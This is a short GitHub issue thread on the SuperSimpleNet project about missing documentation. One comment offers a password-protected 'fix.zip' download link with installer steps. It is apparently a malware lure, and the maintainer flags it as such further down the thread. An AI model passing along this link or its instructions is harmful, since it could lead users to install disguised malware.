### ISSUE TITLE
Missing documentation

### ISSUE THREAD

**Issue by davidhozic** [blaz-r/SuperSimpleNet#1]
Plz sirr, there's no docs

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by blaz-r** [comment]
The above link is in no way connected to the project, so don't download that, looks like some sort of malware.

The code will be released soon, including the guide on how to use it.

**Comment by davidhozic** [comment]
:)
